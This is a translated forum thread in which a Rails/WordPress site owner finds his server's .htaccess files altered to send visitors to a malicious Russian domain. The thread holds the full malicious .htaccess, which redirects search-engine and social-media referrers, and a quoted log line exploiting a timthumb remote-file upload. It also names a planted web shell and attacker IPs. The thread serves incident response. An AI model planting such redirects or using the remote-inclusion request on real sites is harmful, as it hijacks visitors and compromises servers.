Возможный дубликат:
Мой сервер был взломан в АВАРИИ
Поэтому я очень запаниковал.
У меня есть приложение Rails, которое я создаю, размещенное на VPS для промежуточной среды. Я настроил его ранее в этом месяце, и все работало нормально (особенно с развертыванием capistrano). Сегодня я развернул последний код разработчика на веб-сервере и пошел его протестировать. Я нажал на URL (http://openstudyr.ashleyangell.com) и заметил, что он выполняет странный поиск в 'http://guide-securesoft.ru/fliht/index.php?1314066061'о котором я никогда раньше не слышал, и что нажатие на любую из моих ссылок также (в конечном итоге перенаправляет на тот же / похожий URL-адрес).
Я не разбираюсь в Linux, но у меня достаточно ума, чтобы убедиться, что все мои SSH выполняются с аутентификацией по ключу, я никогда не использую root, а пароль root представляет собой буквенно-цифровую строку длиной около 24 символов.
Я проверил свою конфигурацию Apache для виртуального хоста, но все в точности так, как я его оставил.
Я чувствую, что мое сердце вот-вот вырвется из груди и взорвется. Я не уверен, что делать и что проверять дальше.
Я попытался поискать в Google похожие проблемы, но ничего очевидного не обнаружил.
Может ли кто-нибудь помочь? Как я могу а) проверить, был ли я скомпрометирован или нет и б) исправить проблему и предотвратить ее возникновение (я знаю, что на это невозможно ответить, пока не будет).
:(
ОБНОВЛЕНИЕ №1:
Кажется, что все мои URL-адреса выполняют автоматические перенаправления, когда они выполняются из браузера, но если я нажимаю URL-адреса напрямую, они работают нормально. Странно.
ОБНОВЛЕНИЕ №2:
Это также родительский домен http://ashleyangell.com (мой личный блог) с той же проблемой. Однако все остальные виртуальные хосты, похоже, не пострадали.
ОБНОВЛЕНИЕ # 3:
Тестировал на других машинах. Все они ведут себя одинаково, что заставляет меня думать, что он не изолирован от моей машины разработки или подключения к Интернету. (Да?)
ОБНОВЛЕНИЕ # 4:
Я побежал sudo grep -ri -l "guide-securesoft" /var и все файлы .htaccess для сервера совпали! Итак, я выбрал домен, о котором идет речь, и запустил cat /var/www/vhosts/openstudyr.ashleyangell.com/.htaccess и вот что у меня получилось (я очистил его, чтобы он был читабельным):
ErrorDocument 400 http://guide-securesoft.ru/fliht/index.php
ErrorDocument 401 http://guide-securesoft.ru/fliht/index.php
ErrorDocument 403 http://guide-securesoft.ru/fliht/index.php
ErrorDocument 404 http://guide-securesoft.ru/fliht/index.php
ErrorDocument 500 http://guide-securesoft.ru/fliht/index.php
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://guide-securesoft.ru/fliht/index.php [R=301,L]
</IfModule>
... так что, по крайней мере, теперь я ЗНАЮ, как они это делают - но как я могу остановить это снова?
Похоже, что все под /wp-content/ выбрасывает 301 редирект. Поищите там вредоносные .htaccess file - это может быть взломанная учетная запись или уязвимость в WordPress, позволяющая загружать (убедитесь, что ваш WP полностью обновлен).
Помимо этого - в зависимости от вектора атаки, могут быть скомпрометированы другие аспекты системы; общепринятая мудрость заключается в том, чтобы взорвать систему, восстановив резервную копию до компрометации. Нарушение может быть ограничено только тем, что они могли сделать /wp-content/, и если у вас нет хорошего варианта восстановления из резервной копии, может быть достаточно ее очистки, но если вы не сможете определить источник нарушения, возможно, вы не очистили все это.
Видеть Вот за отличное обсуждение и ответы о том, что делать дальше - удачи!
То же самое произошло и с нашей установкой wordpress; спасибо за указатели. Кто-то заметил здесь 404-е страницы .php, перенаправляющие на http://securesoft-trip.ru/attention/index.php?rf= или аналогичный, и я нашел оскорбительный файл .htaccess с помощью команды "find / wordpress_dir / -exec grep" securesoft "{} / dev / null \;". Которая была недавно изменена.
Выполняя поиск вещей, измененных в моем wordpress за последние несколько дней (найдите wordpress_dir / -mtime -3), обнаружил "script_new3.php" (класс PHPMailer) и "wp.php" (# Web Shell от oRb) в корне одной из наших тем.
У меня есть access_logs, уходящий в прошлое, поэтому я посмотрел, когда были созданы эти файлы, и по какому IP. При первом появлении wp.php «216.246.79.192 -» GET themes / * / wp.php HTTP / 1.0 «200 31311» существовала связь между IP-адресом и запросом POST к «thumb.php» в теме 1 за секунду до этого. (Несколько недель назад было много спамерских запросов, которые также искали "timthumb.php" и "thumb.php")
Немного осмотревшись, я обнаружил этот недостаток, который позволял загружать файлы, http://www.websitedefender.com/web-security/timthumb-vulnerability-wordpress-plugins-themes/ Очевидно, у нас была плохая версия в паре наших старых тем WooThemes. Я увидел сообщение "GET /*/thumb.php?src=http://bloggeracom.cu.cc/1.php HTTP / 1.1 "400 117, который мог бы это сделать.
Вот несколько IP-адресов, которые нужно искать, которые выполняли POST / GET для любого из упомянутых файлов (216.246.79.192 - прокси, 92.63.104.30, 94.45.130.238, 91.193.165.188).